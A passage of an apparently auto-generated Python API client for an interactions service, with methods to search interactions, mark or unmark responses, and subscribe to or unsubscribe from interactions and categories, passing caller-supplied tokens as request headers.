        if ('interaction_id' not in params) or (params['interaction_id'] is None):
            raise ValueError("Missing the required parameter `interaction_id` when calling `mark_as_an_response`")
        # verify the required parameter 'response_id' is set
        if ('response_id' not in params) or (params['response_id'] is None):
            raise ValueError("Missing the required parameter `response_id` when calling `mark_as_an_response`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `mark_as_an_response`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `mark_as_an_response`")

        resource_path = '/interactions/{interactionId}/responses/{responseId}/mark'.replace('{format}', 'json')
        path_params = {}
        if 'interaction_id' in params:
            path_params['interactionId'] = params['interaction_id']
        if 'response_id' in params:
            path_params['responseId'] = params['response_id']

        query_params = {}

        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        # `fields` travels as form data on this POST endpoint, not as a query parameter
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def search_interactions(self, search_text, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of matching interactions
        Returns the list of matching interactions
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.search_interactions(search_text, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param str search_text: Search Text, keywords to search (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the _with_http_info variant; data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, **kwargs)
        else:
            (data) = self.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, **kwargs)
            return data

    def search_interactions_with_http_info(self, search_text, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of matching interactions
        Returns the list of matching interactions
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param str search_text: Search Text, keywords to search (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token.
        Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['search_text', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Fold **kwargs into the locals() snapshot; unknown keywords are a
        # programming error, not a server-side one.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method search_interactions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'search_text' is set
        if ('search_text' not in params) or (params['search_text'] is None):
            raise ValueError("Missing the required parameter `search_text` when calling `search_interactions`")
        # verify the required parameter 'interaction_status' is set
        if ('interaction_status' not in params) or (params['interaction_status'] is None):
            raise ValueError("Missing the required parameter `interaction_status` when calling `search_interactions`")
        # verify the required parameter 'start' is set
        if ('start' not in params) or (params['start'] is None):
            raise ValueError("Missing the required parameter `start` when calling `search_interactions`")
        # verify the required parameter 'end' is set
        if ('end' not in params) or (params['end'] is None):
            raise ValueError("Missing the required parameter `end` when calling `search_interactions`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `search_interactions`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `search_interactions`")

        resource_path = '/interactions/search'.replace('{format}', 'json')
        path_params = {}

        # Search criteria travel as query parameters (this is a GET).
        query_params = {}
        if 'search_text' in params:
            query_params['searchText'] = params['search_text']
        if 'interaction_type' in params:
            query_params['interactionType'] = params['interaction_type']
        if 'interaction_status' in params:
            query_params['interactionStatus'] = params['interaction_status']
        if 'association' in params:
            query_params['association'] = params['association']
        if 'start' in params:
            query_params['start'] = params['start']
        if 'end' in params:
            query_params['end'] = params['end']
        if 'fields' in params:
            query_params['fields'] = params['fields']

        # Identity and credentials travel as custom headers.
        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def subscribe_interactin_category(self, category_id, requester_id, client_token, **kwargs):
        # NOTE(review): "interactin" typo is part of the public method name;
        # kept as-is for backward compatibility with existing callers.
        """
        Subscribe interaction category
        Returns the subscribed interaction category
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.subscribe_interactin_category(category_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int category_id: categoryId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionCategory
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the _with_http_info variant; data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs)
            return data

    def subscribe_interactin_category_with_http_info(self, category_id, requester_id, client_token, **kwargs):
        # NOTE(review): "interactin" typo is part of the public method name;
        # kept as-is for backward compatibility with existing callers.
        """
        Subscribe interaction category
        Returns the subscribed interaction category
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int category_id: categoryId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionCategory
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Fold **kwargs into the locals() snapshot, rejecting unknown names.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method subscribe_interactin_category" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'category_id' is set
        if ('category_id' not in params) or (params['category_id'] is None):
            raise ValueError("Missing the required parameter `category_id` when calling `subscribe_interactin_category`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `subscribe_interactin_category`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `subscribe_interactin_category`")

        resource_path = '/interactions/categories/{categoryId}/subscribe'.replace('{format}', 'json')
        path_params = {}
        if 'category_id' in params:
            path_params['categoryId'] = params['category_id']

        query_params = {}

        # Identity and credentials travel as custom headers.
        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        # 'fields' is sent form-encoded in the POST body.
        form_params = []
        local_var_files = {}
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionCategory',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def subscribe_interaction(self, interaction_id, requester_id, client_token, **kwargs):
        """
        Subscribe interaction
        Allows the user to subscribe a interaction
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.subscribe_interaction(interaction_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteraction
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the _with_http_info variant; data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs)
            return data

    def subscribe_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs):
        """
        Subscribe interaction
        Allows the user to subscribe a interaction
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteraction
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Fold **kwargs into the locals() snapshot, rejecting unknown names.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method subscribe_interaction" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'interaction_id' is set
        if ('interaction_id' not in params) or (params['interaction_id'] is None):
            raise ValueError("Missing the required parameter `interaction_id` when calling `subscribe_interaction`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `subscribe_interaction`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `subscribe_interaction`")

        resource_path = '/interactions/{interactionId}/subscribe'.replace('{format}', 'json')
        path_params = {}
        if 'interaction_id' in params:
            path_params['interactionId'] = params['interaction_id']

        query_params = {}

        # Identity and credentials travel as custom headers.
        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        # 'fields' is sent form-encoded in the POST body.
        form_params = []
        local_var_files = {}
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteraction',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def unmark_as_an_response(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Unmark response as a response
        Unmarks the response. This will remove the marked response.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.unmark_as_an_response(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the _with_http_info variant; data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
            return data

    def unmark_as_an_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Unmark response as a response
        Unmarks the response. This will remove the marked response.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Fold **kwargs into the locals() snapshot, rejecting unknown names.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method unmark_as_an_response" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'interaction_id' is set
        if ('interaction_id' not in params) or (params['interaction_id'] is None):
            raise ValueError("Missing the required parameter `interaction_id` when calling `unmark_as_an_response`")
        # verify the required parameter 'response_id' is set
        if ('response_id' not in params) or (params['response_id'] is None):
            raise ValueError("Missing the required parameter `response_id` when calling `unmark_as_an_response`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `unmark_as_an_response`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `unmark_as_an_response`")

        resource_path = '/interactions/{interactionId}/responses/{responseId}/unmark'.replace('{format}', 'json')
        path_params = {}
        if 'interaction_id' in params:
            path_params['interactionId'] = params['interaction_id']
        if 'response_id' in params:
            path_params['responseId'] = params['response_id']

        query_params = {}

        # Identity and credentials travel as custom headers.
        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        # 'fields' is sent form-encoded in the POST body.
        form_params = []
        local_var_files = {}
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def unsubscribe_interactin_category(self, category_id, requester_id, client_token, **kwargs):
        # NOTE(review): "interactin" typo is part of the public method name;
        # kept as-is for backward compatibility with existing callers.
        """
        Unsubscribe interaction category
        Returns the unsubscribed interaction category
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.unsubscribe_interactin_category(category_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int category_id: categoryId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user.
        To get access token user will have to authenticate
        :return: VerveResponseInteractionCategory
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Thin wrapper over the _with_http_info variant; data only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs)
            return data

    def unsubscribe_interactin_category_with_http_info(self, category_id, requester_id, client_token, **kwargs):
        # NOTE(review): "interactin" typo is part of the public method name;
        # kept as-is for backward compatibility with existing callers.
        """
        Unsubscribe interaction category
        Returns the unsubscribed interaction category
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int category_id: categoryId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionCategory
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Fold **kwargs into the locals() snapshot, rejecting unknown names.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method unsubscribe_interactin_category" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'category_id' is set
        if ('category_id' not in params) or (params['category_id'] is None):
            raise ValueError("Missing the required parameter `category_id` when calling `unsubscribe_interactin_category`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `unsubscribe_interactin_category`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `unsubscribe_interactin_category`")

        resource_path = '/interactions/categories/{categoryId}/unsubscribe'.replace('{format}', 'json')
        path_params = {}
        if 'category_id' in params:
            path_params['categoryId'] = params['category_id']

        query_params = {}

        # Identity and credentials travel as custom headers.
        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        # 'fields' is sent form-encoded in the POST body.
        form_params = []
        local_var_files = {}
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionCategory',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def unsubscribe_interaction(self, interaction_id, requester_id, client_token, **kwargs):
        """
        Unsubscribe interaction
        Allows the user to unsubscribe a interaction
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.unsubscribe_interaction(interaction_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteraction
                 If the method is called asynchronously,
                 returns the request thread.
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def unsubscribe_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Unsubscribe interaction Allows the user to unsubscribe a interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. 
